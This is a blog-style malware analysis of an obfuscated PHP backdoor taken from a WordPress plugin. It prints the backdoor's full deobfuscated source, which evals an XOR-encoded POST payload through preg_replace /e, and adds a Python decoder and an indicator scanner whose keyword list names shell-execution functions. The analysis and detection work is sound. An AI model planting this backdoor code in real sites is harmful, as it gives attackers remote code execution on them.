PHP Coding Exploit Analysis

Introduction

Last week was busy for exploit attempts! In fact, I spent a full 5 days cleaning up PHP files and finding new hacking attempts.

This specific exploit popped up just this week; yet again it is from a WordPress site, and specifically code that entered through a plugin. It employs a different coding style, a mix of techniques (see the article in the reference below for some in-depth analysis); it is easy to spot by eye but tricky for detection programs to pick up.

It is yet another way to code an exploit that does not use the keyword "eval" in plain text, as most do.

Synopsis

If you are not going to read the full article, here is a summary (but please spend the few minutes reading everything; you will learn something).

  • Exploit coding techniques are changing weekly.
  • eval(), the usual entry point that activates the code, is hidden (it only ever appears base64-encoded).
  • Reverse XOR is applied to base64-encoded data received in the request.
  • Function calls are made through variables (variable functions), so no function name appears as a literal.

First, the code, tidied up to show functions and declarations clearly:

<?php
$O="\x65";  //'e'
$_="\x62\x61\x73$O\x36\x34\x5f\x64$O\x63\x6f\x64$O"; // base64_decode
$_1=$_("YXJyYXlfbWFw"); // array_map
$S=$_1($_,array("Y2hy","b3Jk","c3Vic3Ry",
    "c3RyX3JlcGVhdA","c3RybGVu","am9pbg",
    "YXJyYXlfbWFw","c3RyX3NwbGl0","emxpYl9kZWNvZGU",
    "ZXZhbCgiJGMiKQ","cHJlZ19yZXBsYWNl","c3RyaXBzbGFzaGVz",
    "Ly4qL2U","X1BPU1Q","X0NPT0tJRQ","UEhQU0VTU0lE","ZXhpdA","ZQ","KCk7",));
// $S becomes a list of PHP keywords
function x($c,$k)
{
    global $S;
    return $S[0]($S[1]($c)^$S[1]($k));
// return chr(ord($c) ^ ord($k));   XOR c and K
}
function d($d,$k)
{
    global $_,$S;
    $i=2;
    $X=$_($d); // base64_decode($d)
// substr( str_repeat( )   -- each $S[...] below is annotated with the index it resolves to as $i++ advances
//             2      3      3      4                 4                  4                      4       5
    $y=$S[$i++]($S[$i++]($k,1+($S[$i]($X)/$S[$i]($k))),0,$S[$i++]($X));
// $y = substr(str_repeat($k, 1 + strlen($X)/strlen($k)), 0, strlen($X));   key repeated out to the data length
//                   5       6          6       7               7              7      8
    return $S[$i++]("",$S[$i++]("x",$S[$i]($X),$S[$i++]($y)));
// return join("", array_map("x", str_split($X), str_split($y)));   byte-wise XOR of data and key ($S[8], zlib_decode, is listed but never called)
}
function e($c)
{
    global $S;
// preg_replace('/.*/e', stripslashes('eval("$c")'), "");   the /e modifier evaluates the replacement as PHP code, so this is the hidden eval
    return $S[10]($S[12],$S[11]($S[9]),"");
}
// e(d($_POST['q'], $_COOKIE['PHPSESSID']));   the payload arrives in POST parameter q, the XOR key in the PHPSESSID cookie
$S[17](d(${$S[13]}["\x71"],${$S[14]}[$S[15]]));
// e("exit" . "();") i.e. eval("exit();");   stops the script once the payload has run
$S[17]($S[16].$S[18]);
?>
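The two obfuscation layers above, the base64 keyword table that becomes $S and the base64-then-XOR transform in d(), can both be undone statically. The following Python is an added example written for this post, not code from the original article or from the sample: it recovers the keyword table from the base64 list and the hex-escaped literal copied from the listing, and reimplements d() so an analyst can decode a captured request (the q parameter and the PHPSESSID cookie from a log or packet capture) without ever executing the PHP. The request value and cookie used in main() are a constructed test vector, not data from a real incident.

```python
"""
Static recovery of the sample's hidden keyword table and its decode layer d(),
written in Python so an analyst can read a payload without executing the PHP.
Added example; not code from the original post. The hex literal and base64 list
are copied from the listing; the request parameter and cookie value used in
main() are constructed test data.
"""
import base64
import re

# $_="\x62\x61\x73$O\x36\x34\x5f\x64$O\x63\x6f\x64$O" with $O = "e" (from the listing)
PHP_HEX_LITERAL = r"\x62\x61\x73$O\x36\x34\x5f\x64$O\x63\x6f\x64$O"
INTERPOLATED = {"O": "e"}

# The base64 array passed to array_map("base64_decode", ...) in the listing.
ENCODED_TABLE = [
    "Y2hy", "b3Jk", "c3Vic3Ry", "c3RyX3JlcGVhdA", "c3RybGVu", "am9pbg",
    "YXJyYXlfbWFw", "c3RyX3NwbGl0", "emxpYl9kZWNvZGU", "ZXZhbCgiJGMiKQ",
    "cHJlZ19yZXBsYWNl", "c3RyaXBzbGFzaGVz", "Ly4qL2U", "X1BPU1Q", "X0NPT0tJRQ",
    "UEhQU0VTU0lE", "ZXhpdA", "ZQ", "KCk7",
]


def php_base64_decode(s: str) -> bytes:
    """PHP's base64_decode() tolerates missing '=' padding; Python's does not."""
    return base64.b64decode(s + "=" * (-len(s) % 4))


def php_unescape(literal: str, variables: dict) -> str:
    """Resolve \\xHH escapes and $name interpolation of a PHP double-quoted string."""
    def sub(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return variables[m.group(2)]
    return re.sub(r"\\x([0-9A-Fa-f]{2})|\$([A-Za-z_]\w*)", sub, literal)


def recover_keyword_table() -> list:
    """Equivalent of $S = array_map("base64_decode", array(...))."""
    return [php_base64_decode(t).decode("ascii") for t in ENCODED_TABLE]


def repeat_key(key: bytes, length: int) -> bytes:
    """substr(str_repeat($k, 1 + strlen($X)/strlen($k)), 0, strlen($X))"""
    if not key:
        raise ValueError("empty key: the PHP would divide by zero here")
    return (key * (1 + length // len(key)))[:length]


def decode_payload(q_param: str, phpsessid: str) -> bytes:
    """
    Equivalent of d($_POST['q'], $_COOKIE['PHPSESSID']): base64-decode the
    request parameter, then XOR each byte with the cookie repeated to the data
    length (the join / array_map("x", ...) / chr(ord ^ ord) chain).
    """
    data = php_base64_decode(q_param)
    key = repeat_key(phpsessid.encode(), len(data))
    return bytes(a ^ b for a, b in zip(data, key))


if __name__ == "__main__":
    print(php_unescape(PHP_HEX_LITERAL, INTERPOLATED))  # base64_decode
    for i, name in enumerate(recover_keyword_table()):
        print(f"[{i}] => {name}")
    # Constructed vector: "echo 1;" XORed with cookie "ab", base64 without padding.
    print(decode_payload("BAEJDUFTWg", "ab"))
```

Run it as a script and the table printed matches the variable dump below. Note that repeat_key refuses an empty cookie: the PHP divides by strlen($k), so a request without PHPSESSID makes the backdoor itself fault, which is worth remembering when you see a lone division-by-zero warning from an unknown file in the error log.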

A dump of the variables gives a clear clue as to what the code executes:

    [O] => e
    [_] => base64_decode
    [_1] => array_map
array_map
Array
(
    [0] => chr
    [1] => ord
    [2] => substr
    [3] => str_repeat
    [4] => strlen
    [5] => join
    [6] => array_map
    [7] => str_split
    [8] => zlib_decode
    [9] => eval("$c")
    [10] => preg_replace
    [11] => stripslashes
    [12] => /.*/e
    [13] => _POST
    [14] => _COOKIE
    [15] => PHPSESSID
    [16] => exit
    [17] => e
    [18] => ();
)
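Because every keyword in the dump above is carried as base64 and every call goes through a variable, a grep for eval or preg_replace finds nothing. What does survive are the habits of the obfuscator: runs of \xHH escapes spelling a function name, a variable used directly as a function ($_(...), $S[0](...)), variable-variables resolving a superglobal (${$S[13]}), and short quoted base64 tokens that decode to PHP function names. The scanner below is an added example written for this post, not a tool from the original article; it checks those indicators over a PHP source string or a directory tree. The two PHP snippets inside it are constructed: one abbreviated from the listing, one benign.

```python
"""
Indicator scan for the obfuscation style shown in this post, written in Python
so it can run over a web root from a cron job or an IR workstation.
Added example; not code from the original post. The sample strings below are
constructed for the demonstration.
"""
import base64
import re
from pathlib import Path

# PHP names that legitimate code has no reason to hide inside base64.
SUSPECT_DECODED = {
    "eval", "assert", "preg_replace", "base64_decode", "array_map", "str_split",
    "join", "chr", "ord", "zlib_decode", "stripslashes", "exit", "exec",
    "system", "shell_exec", "passthru", "_POST", "_GET", "_COOKIE", "_REQUEST",
}

INDICATORS = {
    # three or more consecutive \xHH escapes: a function name spelled in hex
    "hex_escape_run": re.compile(r"(?:\\x[0-9A-Fa-f]{2}){3,}"),
    # a variable (or array element) used directly as a function: $_(...), $S[0](...)
    "variable_function_call": re.compile(r"\$[A-Za-z_]\w*(?:\[[^\]]*\])?\s*\("),
    # variable-variable: ${$x} resolving a superglobal name at run time
    "variable_variable": re.compile(r"\$\{\s*\$"),
    # the deprecated /e modifier written literally in a preg_replace pattern
    "preg_replace_e_modifier": re.compile(r"preg_replace\s*\(\s*['\"]/.*?/\w*e\w*['\"]"),
}
# a quoted token made only of base64 characters
QUOTED_B64 = re.compile(r"""["']([A-Za-z0-9+/]{4,}={0,2})["']""")


def decode_b64_token(token: str):
    """Decode a base64 token the way PHP would; None if it is not printable ASCII."""
    if len(token.rstrip("=")) % 4 == 1:      # impossible length for base64
        return None
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        text = raw.decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def scan_source(src: str) -> dict:
    """Return {indicator_name: [matched snippets]} for one PHP source string."""
    findings = {}
    for name, rx in INDICATORS.items():
        hits = [m.group(0) for m in rx.finditer(src)]
        if hits:
            findings[name] = hits
    decoded = []
    for m in QUOTED_B64.finditer(src):
        text = decode_b64_token(m.group(1))
        if text and any(re.search(rf"\b{re.escape(k)}\b", text) for k in SUSPECT_DECODED):
            decoded.append(f"{m.group(1)} -> {text}")
    if decoded:
        findings["base64_encoded_keyword"] = decoded
    return findings


def scan_tree(root: str) -> dict:
    """Scan every *.php file below root; returns {path: findings} for files with hits."""
    report = {}
    for path in Path(root).rglob("*.php"):
        try:
            src = path.read_text(errors="replace")
        except OSError:
            continue
        found = scan_source(src)
        if found:
            report[str(path)] = found
    return report


# Constructed sample, abbreviated from the listing in this post (scanned as text, never run).
SAMPLE_SUSPICIOUS = r'''<?php
$O="\x65";
$_="\x62\x61\x73$O\x36\x34\x5f\x64$O\x63\x6f\x64$O";
$_1=$_("YXJyYXlfbWFw");
$S=$_1($_,array("Y2hy","b3Jk","ZXZhbCgiJGMiKQ","Ly4qL2U","X1BPU1Q"));
$S[2](d(${$S[4]}["\x71"],${$S[4]}["k"]));
'''

# Constructed benign sample with none of the indicators.
SAMPLE_BENIGN = r'''<?php
function greet(string $name): string {
    return "Hello, " . htmlspecialchars($name);
}
echo greet($_GET["name"] ?? "world");
'''

if __name__ == "__main__":
    for name, hits in scan_source(SAMPLE_SUSPICIOUS).items():
        print(f"{name}: {hits}")
    print("benign sample:", scan_source(SAMPLE_BENIGN))
```

Treat variable_function_call as a weak signal on its own (callbacks such as $handler($event) are common in plugin code) and weight the decoded-keyword and variable-variable hits higher. The preg_replace_e_modifier check deliberately does not fire on this sample, because the pattern /.*/e is itself base64; that is exactly why the decoded-keyword pass is needed, and why a file scoring on several indicators at once deserves a manual look.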

References